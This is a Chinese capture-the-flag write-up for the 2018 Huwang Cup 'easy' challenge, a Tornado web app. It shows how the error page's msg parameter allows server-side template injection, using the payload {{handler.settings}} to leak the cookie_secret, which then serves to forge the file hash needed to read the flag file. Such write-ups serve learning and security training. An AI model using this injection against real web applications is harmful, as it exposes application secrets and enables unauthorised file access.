[护网杯 2018]easy

打开题目，获得三个txt文件

/flag.txt
/welcome.txt
/hints.txt

逐个查看

/flag.txt
flag in /fllllllllllllag

/welcome.txt
render

/hints.txt
md5(cookie_secret+md5(filename))

注意网址

file?filename=/hints.txt&filehash=a5e3bf0b05c444070549eeced63bdeab

那么我们应该是要访问

file?filename=/fllllllllllllag&filehash=md5(cookie_secret+md5(filename))

接下来的问题是cookie_secret要从哪里获得
注意题目的名字，tornado是python的web框架
搜索"tornado cookie_secret"，可以知道cookie_secret是用来防止cookie被篡改的。
要么拿到cookie_secret的值，要么有什么方法可以绕过校验cookie？

尝试无hash值访问flag，结果得到

Error

注意此时的网址，这是一个很蹊跷的网址

error?msg=Error

传递一个名为msg的参数？
尝试修改

error?msg=12345

回显

12345

结合welcome.txt提示的render，那么这应该是服务端渲染处理产生的网页，可以借此得到cookie_secret
tronado模板语法规则为{{ expression }}
那么尝试

error?msg={{handler.settings}}

回显

{‘autoreload’: True, ‘compiled_template_cache’: False, ‘cookie_secret’: ‘077d7766-0bc3-4c19-8fb7-c2cfa2921e7a’}

用提示的加密方法得到filehash即可得到flag